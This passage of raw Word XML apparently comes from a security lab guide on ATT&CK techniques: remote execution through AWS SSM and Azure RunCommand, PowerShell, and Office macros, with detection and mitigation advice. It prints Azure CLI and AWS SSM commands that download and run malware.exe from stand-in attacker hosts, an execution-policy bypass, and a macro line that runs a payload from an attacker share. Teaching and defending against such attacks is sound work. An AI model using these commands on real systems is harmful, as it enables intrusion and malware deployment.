        <w:t xml:space="preserve"> (North Korea) reportedly used stolen cloud credentials to gain access to infrastructure and run malware using cloud-native tools like AWS SSM (Systems Manager). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010B4B52" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2955482E" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="219" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Commands / Scripts: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BED9D0" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="0074BA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Azure CLI Example:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB6E261" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26179548"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119" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="715"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">az vm run-command invoke -g MyResourceGroup -n TargetVM --command-id </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C6B050"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5381"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="705" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="43"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RunPowerShellScript --scripts "Invoke-WebRequest http://attacker/m.exe -OutFile </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E66E000"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5381"/>
        </w:tabs>
        <w:spacing w:after="473" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="705" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>C:\\malware.exe; Start-Process C:\\malware.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAC526A" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="350" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE29470"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5242"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="43"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>aws ssm send-command --instance-ids i-1234567890abcdef0 --document-name AWS-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B653DC4"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0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RunPowerShellScript --parameters 'commands</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"Invoke-WebRequest </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FF6112"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0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213BB35A"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56" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http://attacker.com/malware.exe -OutFile C:\\malware.exe", "Start-Process C:\\malware.exe"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5C45EF"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184" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F3AB2F" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="261" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFAD6E1" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC Scenario: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28126768" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker obtains stolen AWS or Azure credentials via phishing or leaked config files. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515C963" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logs into the cloud dashboard or CLI. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDBB52F" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SSM (AWS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RunCommand (Azure)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to push commands to the target VM. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC273DC" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command downloads a malicious executable (malware.exe) and executes it silently. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E3AA13" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Since this is done using cloud-native tools, no remote desktop session or open ports are required. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090044CA" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5BC176" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="321B41"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Detection: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D19C207" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor logs from AWS CloudTrail or Azure Activity Logs for unexpected RunCommand or SSM usage. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4035718A" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag automation scripts executing outside of scheduled maintenance times. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D51A3A8" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="247"/>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Alert on VMs receiving remote commands from unexpected IPs or accounts. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20004CC9" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="148" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="414" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02EC7AF7" wp14:editId="4536168B">
                <wp:extent cx="5944870" cy="19939"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="6923" name="Group 6923"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5944870" cy="19939"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5944870" cy="19939"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="9211" name="Shape 921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12" name="Shape 9212"/>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13" name="Shape 9213"/>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14" name="Shape 9214"/>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15" name="Shape 9215"/>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216" name="Shape 9216"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="59418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7" name="Shape 9217"/>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8" name="Shape 9218"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3353" y="1689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219" name="Shape 9219"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="59418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923" style="width:468.1pt;height:1.57001pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59448,199">
                <v:shape id="Shape 9220" style="position:absolute;width:59436;height:196;left:0;top:0;" coordsize="5943600,19685" path="m0,0l5943600,0l5943600,19685l0,19685l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 9221" style="position:absolute;width:91;height:91;left:3;top:1;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 9222" style="position:absolute;width:59383;height:91;left:33;top:1;" coordsize="5938393,9144" path="m0,0l5938393,0l5938393,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 9223" style="position:absolute;width:91;height:91;left:59418;top:1;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 9224" style="position:absolute;width:91;height:137;left:3;top:31;" coordsize="9144,13716" path="m0,0l9144,0l9144,13716l0,13716l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 9225" style="position:absolute;width:91;height:137;left:59418;top:31;" coordsize="9144,13716" path="m0,0l9144,0l9144,13716l0,13716l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 9226" style="position:absolute;width:91;height:91;left:3;top:168;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 9227" style="position:absolute;width:59383;height:91;left:33;top:168;" coordsize="5938393,9144" path="m0,0l5938393,0l5938393,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 9228" style="position:absolute;width:91;height:91;left:59418;top:168;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468E6BF3" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="00A6ED"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D01434" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce Just-In-Time (JIT) access — allow command execution only when required and approved. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A4014F" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply Role-Based Access Control (RBAC) to limit who can run admin commands. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D2F531" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable Multi-Factor Authentication (MFA) for all cloud admin accounts. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1502D7" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use cloud security tools like AWS GuardDuty or Microsoft Defender for Cloud to detect abuse. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041AA1C4" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="259" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBC7D66" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="366" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3214"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">                    PROCEDURE (Lab Steps</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>) :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Setup: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36237770" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows VM with PowerShell and MS Office installed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A9E52C" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AWS or Azure account for cloud PoC (can be simulated). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C98886" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="250"/>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tools: PowerShell, Word, AWS CLI, Azure CLI </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8757B8" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="219" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763CFBEB" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C994A8D" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>T1059 - PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCDD784" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Host malicious payload.ps1 on HTTP server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D1CA0E" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trigger execution: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49415287" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="89" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A07DDE8"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4364"/>
        </w:tabs>
        <w:spacing w:after="499" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="705" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>powershell.exe -ExecutionPolicy Bypass -File payload.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD8F774" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="196" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009A05BF" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T1204.002 - Macro Execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB1361" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create .docm file with macro: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0283436A" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="425" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="414" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BDE9F4"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4810"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="664" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="43"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="43"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Shell "powershell.exe -ExecutionPolicy Bypass -File \\attacker\payload.ps1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C4E676" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="119" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA0128" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Simulate phishing email delivery. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9B4B1F" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User opens document, enables macro → payload runs. </w:t>
      </w:r>
    </w:p>
